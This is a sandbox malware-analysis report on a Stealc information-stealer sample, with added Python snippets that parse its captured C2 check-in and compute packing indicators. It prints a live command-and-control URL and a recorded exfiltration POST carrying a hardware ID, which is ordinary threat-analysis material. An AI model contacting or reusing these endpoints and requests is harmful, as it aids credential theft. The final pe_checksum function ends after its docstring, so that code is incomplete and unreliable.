
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522624
MD5: bb08552092b4a0fe9610493efde4ddfc
SHA1: e4bd47f98aa7e1d41c6c2265ca45d606b49ba023
SHA256: 094b280b1e8ecb2574307e5f44d1678b3abe07c71ebfe779a7dd914bf789292b
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BB08552092B4A0FE9610493EFDE4DDFC)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7260 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7260 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.c40000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma
No Sigma rule has matched

Suricata alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-30T13:11:02.926589+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.c40000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/e2b1563c6670f193.php# | Virustotal: Detection: 18%
Source: http://185.215.113.37/e2b1563c6670f193.phps | Virustotal: Detection: 16%
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C47240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C49B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C58EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C54910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C54570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C53EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C4DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 34 41 39 36 46 44 31 45 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a
    Data Ascii (CRLF-separated, as decoded from the raw bytes):
    ------DHCBAEHJJJKKFIDGHJEC
    Content-Disposition: form-data; name="hwid"

    974A96FD1E8E3984212470
    ------DHCBAEHJJJKKFIDGHJEC
    Content-Disposition: form-data; name="build"

    doma
    ------DHCBAEHJJJKKFIDGHJEC--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C44880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 (same headers and body as the POST listed above)
Source: file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php#
Source: file.exe, 00000000.00000002.1702489973.00000000008E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&8
Source: file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpDWF
Source: file.exe, 00000000.00000002.1702489973.00000000008C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phps
Source: file.exe, 00000000.00000002.1702489973.00000000008DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1702489973.000000000087E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37O
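The check-in above is the first thing the sample sends to its C2: a multipart/form-data POST with two fields, hwid and build, and no User-Agent header. The following is an added example (not part of the Joe Sandbox report and not Stealc's own code) that decodes the captured "Data Raw" bytes, parses the multipart body, and cross-checks it against the other findings on this page: the Content-Length of 211, the missing User-Agent, and the "Botnet" value in the extracted configuration. The headers, body hex and configuration are copied from the report; the parser and the checks are this example's own.

```python
"""Parse and cross-check the Stealc C2 check-in captured above.

Added example, not part of the Joe Sandbox report and not Stealc's code.
The request headers, the raw body (the "Data Raw" hex dump) and the
extracted configuration are copied from the report; everything else is
this example's own logic.
"""
import re

# Headers of the captured POST, separated out from the report's run-together line.
REQUEST_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}

# "Data Raw" from the report, verbatim (bytes.fromhex ignores the whitespace).
POST_BODY_HEX = (
    "2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a "
    "39 37 34 41 39 36 46 44 31 45 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a "
    "2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a "
    "43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 "
    "6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a "
    "64 6f 6d 61 0d 0a "
    "2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 2d 2d 0d 0a"
)
POST_BODY = bytes.fromhex(POST_BODY_HEX)

# Configuration the extractor recovered from the unpacked image.
EXTRACTED_CONFIG = {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}


def boundary_from_content_type(content_type: str) -> str:
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if m is None:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(2)


def parse_multipart_form(body: bytes, boundary: str) -> dict:
    """{field name: value} for a multipart/form-data body (RFC 7578).

    Each part is introduced by "--" + boundary on its own line; the closing
    delimiter carries two more dashes. Only plain text fields are handled,
    which is all the check-in uses.
    """
    delim = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delim):
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        if not part or part == b"--":          # preamble / closing delimiter
            continue
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("part without header/body separator")
        m = re.search(rb'name="([^"]*)"', head)
        if m is None:
            raise ValueError("part without a form-data name")
        fields[m.group(1).decode("ascii")] = value.decode("ascii", errors="replace")
    return fields


def analyse_checkin(headers: dict, body: bytes, config: dict) -> dict:
    """Check the captured request against the report's other findings."""
    fields = parse_multipart_form(body, boundary_from_content_type(headers["Content-Type"]))
    return {
        "fields": fields,
        # "HTTP GET or POST without a user agent": no User-Agent header at all.
        "user_agent_present": any(k.lower() == "user-agent" for k in headers),
        "content_length_matches": int(headers["Content-Length"]) == len(body),
        # The "build" field is the Botnet tag from the extracted configuration.
        "build_matches_config": fields.get("build") == config["Botnet"],
        # The hwid is sent as an upper-case hex string; how it is derived is not on the page.
        "hwid_is_hex": re.fullmatch(r"[0-9A-F]+", fields.get("hwid", "")) is not None,
    }


if __name__ == "__main__":
    for key, val in analyse_checkin(REQUEST_HEADERS, POST_BODY, EXTRACTED_CONFIG).items():
        print(f"{key}: {val}")
```

The same parser works on any multipart body pulled out of a PCAP, so it can be pointed at later POSTs from the same host to see which form fields (and attached files) the exfiltration uses; the missing User-Agent plus a bare-IP Host header is what the "without a user agent" signature and the Suricata check-in rule key on.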

                System Summary

Source: file.exe | Static PE information: section name: (name not rendered in this export; see "PE file contains section with special chars")
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (name not rendered in this export)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB50B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F17033
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F31823
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01007043
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100D370
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100FBE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01012BE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101650C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01011562
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB0436
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01008C55
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F0E518
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100E7B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010147F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0101CE32
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FA4FBB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01017E75
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0100A6BF
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00C445C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nouqlerf ZLIB complexity 0.9947534961112773
Source: file.exe, 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1662202182.0000000004D90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C58680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C53720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8LCNO65F.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1867776 > 1048576
Source: file.exe | Static PE information: Raw size of nouqlerf is bigger than: 0x100000 < 0x1a1e00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.c40000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nouqlerf:EW;fksviyxr:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nouqlerf:EW;fksviyxr:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C59860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ca46c should be: 0x1cd7c5
Source: file.exe | Static PE information: section name: (name not rendered in this export)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (name not rendered in this export)
Source: file.exe | Static PE information: section name: nouqlerf
Source: file.exe | Static PE information: section name: fksviyxr
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102691C (at 0_2_01026985): push 2004896Dh; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102691C (at 0_2_010269AB): push 6790F598h; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB50B2 (at 0_2_00FB5119): push edi; mov dword ptr [esp], ebp
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB50B2 (at 0_2_00FB5130): push ecx; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB50B2 (at 0_2_00FB51E1): push 59710011h; mov dword ptr [esp], esi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FB50B2 (at 0_2_00FB528D): push eax; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0107314C (at 0_2_0107315D): push ebx; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C9159 (at 0_2_010C9175): push 7900132Eh; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010C9159 (at 0_2_010C91C1): push edx; mov dword ptr [esp], esi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B1956 (at 0_2_010B196A): push ebx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B1956 (at 0_2_010B1978): push ebx; mov dword ptr [esp], 77BA6F00h
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_010B1956 (at 0_2_010B199C): push edx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102616A (at 0_2_01026173): push 21008B4Bh; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0102616A (at 0_2_01026295): push ebx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_0101998E): push ebx; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019994): push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_010199C7): push edx; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019A14): push 7DD9D488h; mov dword ptr [esp], edi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019AC6): push 54E1729Bh; mov dword ptr [esp], edi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019ACA): push ecx; mov dword ptr [esp], eax
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019B69): push esi; mov dword ptr [esp], ebx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019BD4): push ebp; mov dword ptr [esp], esi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019BDE): push 7331F313h; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019C79): push esi; mov dword ptr [esp], edi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019CA0): push 2374EF46h; mov dword ptr [esp], edi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019D41): push edi; mov dword ptr [esp], 1976201Dh
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019E30): push ebp; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019E8D): push ebx; mov dword ptr [esp], edx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019F68): push ebp; mov dword ptr [esp], esi
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019F9D): push 0C71D7F6h; mov dword ptr [esp], ecx
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_01019987 (at 0_2_01019FA2): push ebx; mov dword ptr [esp], eax
Source: file.exe | Static PE information: section name: nouqlerf entropy: 7.953428476394443
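Three of the static findings in this section come from simple arithmetic over the file: the entropy of the nouqlerf section (7.95 bits per byte, close to the 8.0 ceiling), its ZLIB complexity (0.9947, i.e. the section barely compresses, which is what packed or encrypted code looks like), and the invalid PE header checksum (stored 0x1ca46c, computed 0x1cd7c5, a common side effect of a packer rewriting the image). The block below is an added example, not Joe Sandbox's code and not the sample's, that reproduces all three computations. The sample itself is not available here, so the inputs are constructed: a seeded pseudorandom block stands in for the packed section, a zero-filled block for an empty one, and a minimal hand-built MZ/PE header stub carries only the fields the checksum needs. The ZLIB complexity definition (compressed size over raw size) and the packed-code thresholds are assumptions; the page does not state the sandbox's exact formulas.

```python
"""Static indicators the report prints for the packed sample, reproduced:
section entropy ("nouqlerf entropy: 7.95"), ZLIB complexity (0.9947) and
the PE header checksum ("real checksum: 0x1ca46c should be: 0x1cd7c5").

Added example, not Joe Sandbox's or the sample's code. The sample is not
available here, so every input is constructed: a seeded pseudorandom block
stands in for the packed section, a zero-filled block for an empty one, and
the PE header is a minimal hand-built stub that only carries the fields the
checksum needs.
"""
import math
import random
import struct
import zlib
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 is the ceiling, reached by uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def zlib_complexity(data: bytes) -> float:
    """Compressed size over raw size. Packed or encrypted bytes do not
    compress, so the ratio sits near 1.0. Assumed definition: the page does
    not state Joe Sandbox's exact formula."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def section_indicators(name: str, data: bytes) -> dict:
    """The two per-section numbers from the report plus a verdict. The
    thresholds are the usual rule of thumb for packed code, not the sandbox's."""
    ent, cpx = shannon_entropy(data), zlib_complexity(data)
    return {"section": name, "entropy": ent, "zlib_complexity": cpx,
            "likely_packed": ent > 7.0 and cpx > 0.9}


def checksum_field_offset(image: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew (at 0x3C),
    plus the 4-byte PE signature and 20-byte file header, plus 0x40 into the
    optional header (same for PE32 and PE32+)."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20 + 0x40


def pe_checksum(image: bytes, field_offset: int) -> int:
    """CheckSum as imagehlp computes it (pefile's generate_checksum() is the
    same): add the file as little-endian 32-bit words with end-around carry,
    skipping the CheckSum field, fold to 16 bits, then add the file size."""
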